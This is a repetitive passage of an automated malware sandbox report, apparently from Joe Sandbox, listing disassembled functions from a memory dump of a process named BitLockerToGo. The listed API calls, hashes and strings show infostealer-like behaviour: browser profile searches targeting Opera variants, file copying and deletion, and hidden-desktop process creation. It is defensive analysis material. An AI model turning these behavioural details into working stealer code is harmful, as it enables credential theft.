                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 956187361-332874205
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3a642f7f43be521ec3aa2650363e1e43207f54b44a7cc8b8eb1949124c3b03f3
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 92ad4a2226891f0ca1115e68f9848e0e40f91fcb405e47c74c11928c5e554103
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a642f7f43be521ec3aa2650363e1e43207f54b44a7cc8b8eb1949124c3b03f3
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C12CB1D4022AABDF229F64DD85AEEB7BDAF04714F0045A1FA09E3140DB31AB958F51
                                                                                                                                                                                                                                                                                                                                                          Function 02A17D20 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2178766154-445461498
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d5680eb3e792029d8bed95b87a1e3883d5b2d57809f6ca7b3ade2e337bbf9cdb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 60a278ffa4ef0b52a885dfae5162c519b6322bff1cdb386d8c1bd541a45b9567
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5680eb3e792029d8bed95b87a1e3883d5b2d57809f6ca7b3ade2e337bbf9cdb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0810771D8022D9BDF61EB64DD85BCAB7F9BB04310F0085A5AA49A3110DF31AB958F91
                                                                                                                                                                                                                                                                                                                                                          Function 02A08DEA Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 149stringsleepprocessCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08E2B
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A08E44
                                                                                                                                                                                                                                                                                                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02A08E5D
                                                                                                                                                                                                                                                                                                                                                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02A08E79
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08E99
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A08EAE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A08EC1
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A3821C), ref: 02A08ED3
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08EE2
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A08F13
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08F30
                                                                                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 02A08F8B
                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 02A08F9A
                                                                                                                                                                                                                                                                                                                                                          • CloseDesktop.USER32(?), ref: 02A08FCF
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3792893142-3777181503
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fa2d0470f6f5ffa0194648c67e5019ba03583b60a4e7285aa2623113b5096537
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 59337d9bc39d044fbddd53ab0531f5b255c5654b14ddbc3efd08ff80db569a8b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa2d0470f6f5ffa0194648c67e5019ba03583b60a4e7285aa2623113b5096537
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A512DB1D4022CAFDB21DFA4DD85FDABBBDBB08314F4004A5BA09E2150DA749F958F61
                                                                                                                                                                                                                                                                                                                                                          Function 02A01D70 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A3BBC8,02A3BBCC,02A37AC2,02A37ABF,02A1953D,?,00000000), ref: 02A01F94
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3BBD0), ref: 02A01FC7
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3BBD4), ref: 02A01FE1
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,02A3BBD8,02A3BBDC,?,02A3BBE0,02A37AC3), ref: 02A020CD
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A022B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A02326
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A02392
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A023A6
                                                                                                                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 02A025CC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0263F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: Sleep.KERNEL32(000003E8,?,?), ref: 02A18C4D
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A026B6
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A026CA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A139EE: GetFileAttributesA.KERNEL32(?,?,?,02A0EA72,?,?,?), ref: 02A139F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A138A6: GetSystemTime.KERNEL32(?,02A37807,?), ref: 02A138D5
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1475085387-1173974218
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c40353e2537e286411c95a1cf6924c2b35c5568a7c13eba661f2fd42e1b9bc6c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 91775323cb13913a5e6a7f45d6221ef7f5598ddfd91b3c0449abc0ea62517dc5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40353e2537e286411c95a1cf6924c2b35c5568a7c13eba661f2fd42e1b9bc6c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A032A731D812299BDB21EB25EE89BCDB37AAF04354F4105E1AD4877160DF71AF898F81
                                                                                                                                                                                                                                                                                                                                                          Function 02A18D90 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FileFind$_mbscmpwsprintf$CloseFirstFolderNextOperationPath_ismbcupper_splitpath
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 102359269-2848263008
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3ec9b24766a0e436cbe68c217cdb9883fc32d576ca5e0580cd38d3a2de90cc3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a8ecf0e4aaf6b43fc2ff4c56fab576af393bbd9285ccc0174d8706af0839c2e4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec9b24766a0e436cbe68c217cdb9883fc32d576ca5e0580cd38d3a2de90cc3f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6951C37194065C5FEB11DB68EC88BEABBADBB08311F1449F6E549E3140EF30DA998F50
                                                                                                                                                                                                                                                                                                                                                          Function 02A17178 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A171A5
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 02A171BC
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37AC0), ref: 02A171DD
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37AC4), ref: 02A171F7
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A17248
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?), ref: 02A1725B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A1726F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A17282
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A37AC8), ref: 02A17294
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02A172A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 02A1735E
                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 02A17372
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A9F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002AE6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002C41000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3358124521.0000000002C53000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1150833511-4073750446
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 29a08573659e6bf5fbbb68da0bea3a60394aa7032463ee78fe79ff0eebc7e1fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f73669f363b0f8d37bf267750274bfc35d537d054c05c45a8a34bfb82076b581
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29a08573659e6bf5fbbb68da0bea3a60394aa7032463ee78fe79ff0eebc7e1fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7511FB5D4021C9BDF60DB64DD89BC9BBB9AB09310F0005E5EB09E3100EB319B95CF65
                                                                                                                                                                                                                                                                                                                                                          Function 02A0CE96 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,\*.*,02A378EE,02A0DC21,?,?), ref: 02A0CF0E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A38638), ref: 02A0CF2E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A3863C), ref: 02A0CF48
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera,02A3790D,02A37907,02A37906,02A37903,02A378F3,02A378F2,02A378EF), ref: 02A0CFD4
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera GX), ref: 02A0CFE2
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 02A0CFF0
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A3E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpDownload File
